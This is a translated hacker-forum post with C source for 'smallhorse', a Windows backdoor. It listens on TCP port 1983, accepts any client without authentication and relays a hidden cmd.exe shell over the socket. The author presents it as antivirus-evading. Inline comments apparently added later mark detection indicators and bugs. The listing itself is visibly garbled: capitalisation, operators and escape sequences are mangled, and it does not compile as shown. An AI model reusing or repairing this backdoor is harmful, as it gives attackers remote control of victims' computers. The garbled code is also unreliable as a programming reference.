A simple shell Backdoor
Author: Pony/smallhorse [e.s.t VIP] (the "e.s.t VIP" tag may be left out)
Source: evil baboons China
Recently, out of boredom, I decided to write a simple shell backdoor, one that is also not picked up by the antivirus software K. I referred to the T-CMD source code and an earlier article on anti-hacking, and learned a lot from both.
The program is very simple: once run, it opens port 1983 by default (a different port can be set) and waits for a client to connect; NC can be used as the client. I also wanted to turn it into a service so that it runs automatically at startup, but for lack of time that is left for a later version.
Usage: smallhorse [-P port]. The -P parameter sets the port to listen on.
The source program is posted below so that we can study it and make progress together. I hope you will not hesitate to offer advice; my thanks in advance.
QQ: 11189658 E-MAIL: horse_man@163.com
Compiled with VC++ 6.0 on Windows 2003.
# Include <winsock2.h>
# Include <stdio. h>
# Pragma comment (Lib, "ws2_32.lib ")
// NOTE(review): this listing is a mangled transcription (case, escape
// sequences and operators are garbled); it is not compilable as shown and
// is kept verbatim here for study of the pattern only.
// Default TCP port the listener binds to; main() replaces it with the
// value given after "-P" when exactly that argument form is supplied.
Int Port = 1983;
// Per-connection worker, defined below: relays one accepted socket to a
// hidden cmd.exe through a pair of anonymous pipes.
DWORD winapi clientthread (lpvoid lpparam );
// Prints the startup banner and usage text to stdout.
// Defender note: these literal strings ("smallhorse", "shell v0.1",
// "[e.s. T] VIP", "default port is 1983") would appear verbatim in the
// compiled binary and are a simple static indicator for it.
Void help ()
{Printf ("/*********************************** * *** // n ");
Printf ("| this smallhorse's first choice shell v0.1 |/N ");
Printf ("| thanks for using it! |/N ");
Printf ("| smallhorse [e.s. T] VIP 2005.03 |/N ");
Printf ("| ************************************ * ** |/N ");
Printf ("| usage: smallhorse [-P port] |/N ");
Printf ("| Port: port number to listen on |/N ");
Printf ("| default port is 1983 |/N ");
Printf ("//*********************************** * *** // n ");
Return;
}
// Listener side of the backdoor. Initialises Winsock, binds a TCP socket on
// every local interface (INADDR_ANY) at the global Port, then accepts
// clients forever. There is no authentication of any kind: any peer that
// can reach the port is greeted with a fixed banner and handed to
// clientthread, which gives it a command shell. Every failure path simply
// returns, leaving whatever was initialised behind.
Void opendoor ()
{
// Initialize Winsock.
Wsadata;
Socket m_socket, acceptclient;
Sockaddr_in service, client;
Int clientsize, I = 0;   // I is declared but never used
Int iresult = wsastartup (makeword (2, 2), & wsadata );
If (iresult! = No_error)
Return;
// Create a socket.
M_socket = socket (af_inet, sock_stream, ipproto_tcp );
If (m_socket = socket_error)
Return;
Service. sin_family = af_inet;
// Binds on all interfaces, not just loopback: the shell is reachable from
// any network the host is attached to.
Service. sin_addr.s_addr = htonl (inaddr_any );
Service. sin_port = htons (port );   // 1983 unless overridden via -P in main()
If (BIND (m_socket, (sockaddr *) & service, sizeof (Service) = socket_error)
Return; // specify
If (Listen (m_socket, 5) = socket_error)
Return; // a maximum of five listeners can be queued.
Printf ("/nsmallhorse listen on port: % d... ^ * ^/N", Port );
Clientsize = sizeof (client );
// Accept loop: one thread per client, no limit on concurrent clients.
While (1)
{
Acceptclient = accept (m_socket, (sockaddr *) & client, & clientsize );
If (acceptclient = socket_error)
Return; // accept the connection
Printf ("Client Connected./N ");
// Fixed greeting sent before any input is read. This text ("thanks for
// using", "smallhorse's writable shell", "good luck") is the first thing
// a packet capture or IDS sees on a connection to this port, so it is a
// reliable network signature.
Char * sendbuf = "/********************************** * *** // n/tthanks for using... /n/tsmallhorse's writable shell! /N/tgood luck! /N //************************************ * ** // n/n ";
Send (acceptclient, sendbuf, strlen (sendbuf), 0 );
// The worker is handed a pointer to this function's single acceptclient
// local, which the next accept() overwrites; the Sleep below appears to
// be the only guard against the worker reading the wrong socket. The
// thread handle returned by createthread is never closed.
If (createthread (null, 0, clientthread, (lpvoid) & acceptclient, 0, null) = NULL)
Printf ("create thread error! /N ");
Sleep (1000 );
}
// Unreachable: the loop above only exits through the early returns, so
// Winsock is never cleaned up and the listening socket is never closed.
Wsacleanup ();
Return;
}
// Per-client worker. Spawns a hidden cmd.exe whose stdin, stdout and stderr
// are redirected through two anonymous pipes, then relays bytes between
// those pipes and the client socket until a read, write, send or recv
// fails. Returns 0 in every case.
// Defender notes: the host-side observable is a non-console parent that
// holds a listening socket and creates cmd.exe with SW_HIDE and inherited
// pipe handles. No handle created here (pipes, process, thread, socket)
// is ever closed and the child is never terminated, so each client
// connection very likely leaves a cmd.exe process behind after the
// client disconnects.
DWORD winapi clientthread (lpvoid lpparam)
{Int ret;
Char Buf [1024];
Handle rpipe, wpipe, wfile, rfile;
// Copies the socket out of opendoor's local before the caller reuses it.
Socket acceptclient = (socket) * (socket *) lpparam;
// Inheritable security attributes so the child process receives the pipe
// ends set as its standard handles below.
Security_attributes SA;
SA. nlength = sizeof (SA );
SA. binherithandle = true;
SA. lpsecuritydescriptor = NULL;
// Both createpipe results are stored in ret but never checked; a failed
// pipe would leave rpipe/wpipe uninitialised for the loop below.
Ret = createpipe (& rpipe, & rfile, & SA, 0 );
Ret = createpipe (& wfile, & wpipe, & SA, 0); // create two pipelines for receiving commands and Displaying results respectively.
Startupinfo startinfo;
Getstartupinfo (& startinfo );
// Redirect the child's std handles to the pipe ends and hide its window.
Startinfo. dwflags = startf_useshowwindow | startf_usestdhandles;
Startinfo. hstdinput = wfile;
Startinfo. hstderror = startinfo. hstdoutput = rfile;
Startinfo. wshowwindow = sw_hide;
// Command line is the system directory with cmd.exe appended.
Char character line [max_path];
Getsystemdirectory (cmdline, max_path );
Strcat (cmdline, ("// cmd.exe "));
Process_information proinfo;
// Return value is not checked: on failure the loop below still runs
// against pipes that no child is attached to. proinfo's process and
// thread handles are never closed.
Ret = CreateProcess (using line, null, & startinfo, & proinfo );
Unsigned long byterec;
// Relay loop. Each pass first polls the child's output pipe without
// blocking; if there is output it is forwarded to the client, otherwise
// the thread blocks in recv() waiting for the client. Output produced by
// the child while recv() is blocked is therefore not forwarded until the
// client sends something.
While (1)
{
Sleep (100 );
Peeknamedpipe (rpipe, Buf, 1024, & byterec, 0, 0 );
If (byterec ){
Ret = readfile (rpipe, Buf, byterec, & byterec, 0 );
If (! RET)
Break;
Ret = Send (acceptclient, Buf, byterec, 0 );
If (Ret <= 0)
Break;
}
Else {
// byterec is unsigned long, so a negative (error) result from recv()
// would not be caught by the <= 0 test below and would be passed to
// writefile as a very large length.
Byterec = Recv (acceptclient, Buf, 1024,0 );
If (byterec <= 0)
Break;
Ret = writefile (wpipe, Buf, byterec, & byterec, 0 );
If (! RET)
Break;
}
}
// Socket and pipe handles are left open on exit.
Return 0;
}
// Entry point. Prints the banner, then accepts "-P <port>" as the only
// recognised option (and only when exactly three argv entries are
// present), and finally blocks in opendoor() for the life of the process.
// argv[2] goes through atoi with no range or error check, so a
// non-numeric value yields Port = 0. Nothing here daemonises, hides the
// console or installs persistence; the accompanying text says a service
// mode was planned but not written.
Int main (INT argc, char * argv [])
{
Help ();
If (argc = 3)
If (! Strcmp (argv [1], "-P "))
Port = atoi (argv [2]);
Opendoor ();
Return 0;
}